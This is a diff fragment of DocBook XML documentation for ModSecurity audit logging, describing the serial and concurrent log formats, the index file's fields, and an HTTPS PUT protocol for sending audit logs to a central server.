+                </orderedlist></para>
+            <section>
+                <title>Serial Audit Log Format</title>
+                <para>The serial audit log format stores multiple audit log entries within the same
+                    file (one after another). This is often very convinent (audit log entries are
+                    easy to find) but this format is only suitable for light logging in the current
+                    ModSecurity implementation because writing to the file is serialised: only one
+                    audit log entry can be written at any one time.</para>
+            </section>
+            <section>
+                <title>Concurrent Audit Log Format</title>
+                <para>The concurrent audit log format uses one file per audit log entry, and allows
+                    many transactions to be recorded at once. A hierarchical directory structure is
+                    used to ensure that the number of files created in any one directory remains
+                    relatively small. For example:</para>
+                <programlisting>$LOGGING-HOME/20081128/20081128-1414/20081128-141417-
+  egDKy38AAAEAAAyMHXsAAAAA</programlisting>
+                <para>The current time is used to work out the directory structure. The file name is
+                    constructed using the current time and the transaction ID.</para>
+                <para>The creation of every audit log in concurrent format is recorded with an entry
+                    in the concurrent audit log <emphasis>index file</emphasis>. The format of each
+                    line resembles the common web server access log format. For example:</para>
+                <programlisting>192.168.0.111 192.168.0.1 - - [28/Nov/2008:15:06:32 +0000]
+  "GET /?p=\\ HTTP/1.1" 200 69 "-" "-" NOfRx38AAAEAAAzcCU4AAAAA
+  "-" /20081128/20081128-1506/20081128-150632-NOfRx38AAAEAAAzcCU4AAAAA
+  0 1183 md5:ffee2d414cd43c2f8ae151652910ed96</programlisting>
+                <para>The tokens on the line are as follows:</para>
+                <orderedlist>
+                    <listitem>
+                        <para>Hostname (or IP address, if the hostname is not known)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Source IP address</para>
+                    </listitem>
+                    <listitem>
+                        <para>Remote user (from HTTP Authentication)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Local user (from identd)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Timestamp</para>
+                    </listitem>
+                    <listitem>
+                        <para>Request line</para>
+                    </listitem>
+                    <listitem>
+                        <para>Response status</para>
+                    </listitem>
+                    <listitem>
+                        <para>Bytes sent (in the response body)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Referrer information</para>
+                    </listitem>
+                    <listitem>
+                        <para>User-Agent information</para>
+                    </listitem>
+                    <listitem>
+                        <para>Transaction ID</para>
+                    </listitem>
+                    <listitem>
+                        <para>Session ID</para>
+                    </listitem>
+                    <listitem>
+                        <para>Audit log file name (relative to the audit logging home, as configured
+                            using the <literal>SecAuditLogStorageDir</literal> directive)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Audit log offset</para>
+                    </listitem>
+                    <listitem>
+                        <para>Audit log size</para>
+                    </listitem>
+                    <listitem>
+                        <para>Audit log hash (the has begins with the name of the algorithm used,
+                            followed by a colon, followed by the hexadecimal representation of the
+                            hash itself); this hash can be used to verify that the transaction was
+                            correctly recorded and that it hasn't been modified since.</para>
+                    </listitem>
+                </orderedlist>
+                <note>
+                    <para>Lines in the index file will be up to 3980 bytes long, and the information
+                        logged will be reduced to fit where necessary. Reduction will occur within
+                        the individual fields, but the overall format will remain the same. The
+                        character <literal>L</literal> will appear as the last character on a
+                        reduced line. A space will be the last character on a line that was not
+                        reduced to stay within the limit.</para>
+                </note>
+            </section>
+        </section>
+        <section>
+            <title>Transport Protocol</title>
+            <para>Audit logs generated in multi-sensor deployments are of little use if left on the
+                sensors. More commonly, they will be transported to a central logging server using
+                the transport protocol described in this section:</para>
+            <orderedlist>
+                <listitem>
+                    <para>The transport protocol is based on the HTTP protocol.</para>
+                </listitem>
+                <listitem>
+                    <para>The server end is an SSL-enabled web server with HTTP Basic Authentication
+                        configured.</para>
+                </listitem>
+                <listitem>
+                    <para>Clients will open a connection to the centralisation web server and
+                        authenticate (given the end-point URI, the username and the
+                        password).</para>
+                </listitem>
+                <listitem>
+                    <para>Clients will submit every audit log in a single <literal>PUT</literal>
+                        transaction, placing the file in the body of the request and additional
+                        information in the request headers (see below for details).</para>
+                </listitem>
+                <listitem>
+                    <para>Server will process each submission and respond with an appropriate status
+                        code: </para>
+                    <orderedlist>
+                        <listitem>
+                            <para>200 (OK) - the submission was processed; the client can delete the
+                                corresponding audit log entry if it so desires. The same audit log
+                                entry must not be submitted again.</para>
+                        </listitem>
+                        <listitem>
+                            <para>409 (Conflict) - if the submission is in invalid format and cannot
+                                be processed. The client should attempt to fix the problem with the
+                                submission and attempt delivery again at a later time. This error is
+                                generally going to occur due to a programming error in the protocol
+                                implementation, and not because of the content of the audit log
+                                entry that is being transported. </para>
+                        </listitem>
+                        <listitem>
+                            <para>500 (Internal Server Error) - if the server was unable to
+                                correctly process the submission, due to its own fault. The client
+                                should re-attempt delivery at a later time. A client that starts
+                                receiving 500 reponses to all its submission should suspend its
+                                operations for a period of time before continuing.</para>
+                        </listitem>
+                    </orderedlist>
+                </listitem>
+            </orderedlist>
+            <note>
+                <para>Server implementations are advised to accept all submissions that correctly
+                    implement the protocol. Clients are unlikely to be able to overcome problems
+                    within audit log entries, so such problems are best resolved on the server
+                    side.</para>
+            </note>
+            <note>
+                <para>When en error occurs, the server may place an explanation of the problem in
+                    the text part of the response line.</para>
+            </note>
+            <section>
+                <title>Request Headers Information</title>
+                <para>Each audit log entry submission must contain additional information in the
+                    request headers:</para>
+                <orderedlist>
+                    <listitem>
+                        <para>Header <literal>X-Content-Hash</literal> must contain the audit log
+                            entry hash. Clients should expect the audit log entries to be validated
+                            against the hash by the server.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Header <literal>X-ForensicLog-Summary</literal> must contain the
+                            entire concurrent format index line.</para>
+                    </listitem>
+                    <listitem>
+                        <para>The <literal>Content-Lenght</literal> header must be present and
+                            contain the length of the audit log entry.</para>
+                    </listitem>
+                </orderedlist>
+            </section>
+        </section>
+    </section>
+</article>